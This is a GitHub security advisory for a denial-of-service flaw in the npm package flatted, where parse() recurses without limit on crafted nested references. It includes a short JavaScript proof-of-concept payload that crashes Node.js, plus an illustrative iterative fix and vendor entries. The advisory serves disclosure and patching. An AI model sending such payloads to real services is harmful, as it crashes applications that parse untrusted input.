GHSA-25h7-pfq9-p65f

Published: 13 Mar 2026
Source: github
Github: Reviewed
CVSS3: 7.5

Description

flatted vulnerable to unbounded recursion DoS in parse() revive phase

Summary

flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.

Impact

Denial of Service (DoS). Any application that passes untrusted input to flatted.parse() can be crashed by an unauthenticated attacker with a single request.

flatted has ~87M weekly npm downloads and is used as the circular-JSON serialization layer in many caching and logging libraries.

Proof of Concept

    const flatted = require('flatted');
    // Build deeply nested circular reference chain
    const depth = 20000;
    const arr = new Array(depth + 1);
    arr[0] = '{"a":"1"}';
    for (let i = 1; i <= depth; i++) {
      arr[i] = `{"a":"${i + 1}"}`;
    }
    arr[depth] = '{"a":"leaf"}';
    const payload = JSON.stringify(arr);
    flatted.parse(payload); // RangeError: Maximum call stack size exceeded

Fix

The maintainer has already merged an iterative (non-recursive) implementation in PR #88, converting the recursive revive() to a stack-based loop.
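
The recursion-to-loop conversion described above, shown as an added example; it is not flatted's code and not the code from PR #88. It assumes a simplified flatted-like format, and the names parseIterative, chainPayload and chainDepth are hypothetical.

```javascript
// Added example, not flatted's source. Assumed format: a JSON array, element 0
// is the root; inside containers a string value is a decimal index into it.
function parseIterative(text) {
  const input = JSON.parse(text);
  if (!Array.isArray(input) || input.length === 0) {
    throw new TypeError('expected a non-empty JSON array');
  }
  const seen = new Set(); // containers already queued, so cycles terminate
  const work = [];        // explicit stack: depth costs heap, not call frames
  const schedule = (v) => {
    if (v !== null && typeof v === 'object' && !seen.has(v)) {
      seen.add(v);
      work.push(v);
    }
  };
  schedule(input[0]);
  while (work.length > 0) {
    const node = work.pop();
    for (const key of Object.keys(node)) {
      let value = node[key];
      if (typeof value === 'string') {
        // Reject anything that is not an in-range index before dereferencing.
        if (!/^\d+$/.test(value) || Number(value) >= input.length) {
          throw new RangeError(`invalid reference: ${value}`);
        }
        value = node[key] = input[Number(value)];
      }
      schedule(value);
    }
  }
  return input[0];
}

// Constructed input: element i points at element i + 1, the last is a leaf.
function chainPayload(depth) {
  const items = [];
  for (let i = 0; i < depth; i++) items.push({ a: String(i + 1) });
  items.push('leaf');
  return JSON.stringify(items);
}

// Walks the revived chain with a loop and returns how many levels it has.
function chainDepth(root) {
  let depth = 0;
  for (let n = root; n !== null && typeof n === 'object'; n = n.a) depth++;
  return depth;
}

console.log(chainDepth(parseIterative(chainPayload(200000)))); // 200000
console.log(((r) => r.self === r)(parseIterative('[{"self":"0"}]'))); // true
```

Because each container is queued once and processed from a heap-allocated array, nesting depth and self-references affect memory use only, never the call-stack depth.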

Affected Versions

All versions prior to the PR #88 fix.

Packages

Name: flatted (npm)
Affected versions: < 3.4.0
Fixed version: 3.4.0

EPSS

Percentile: 3%
0.00014
Low

7.5 High

CVSS3

Weaknesses

CWE-674

Related vulnerabilities

CVSS3: 7.5
ubuntu
14 days ago

flatted is a circular JSON parser. Prior to 3.4.0, flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process. This vulnerability is fixed in 3.4.0.

CVSS3: 7.5
redhat
14 days ago

A denial of service flaw has been discovered in the flatted npm library. flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.

CVSS3: 7.5
nvd
14 days ago

flatted is a circular JSON parser. Prior to 3.4.0, flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process. This vulnerability is fixed in 3.4.0.

msrc
2 days ago

flatted: Unbounded recursion DoS in parse() revive phase

CVSS3: 7.5
debian
14 days ago

flatted is a circular JSON parser. Prior to 3.4.0, flatted's parse() f ...
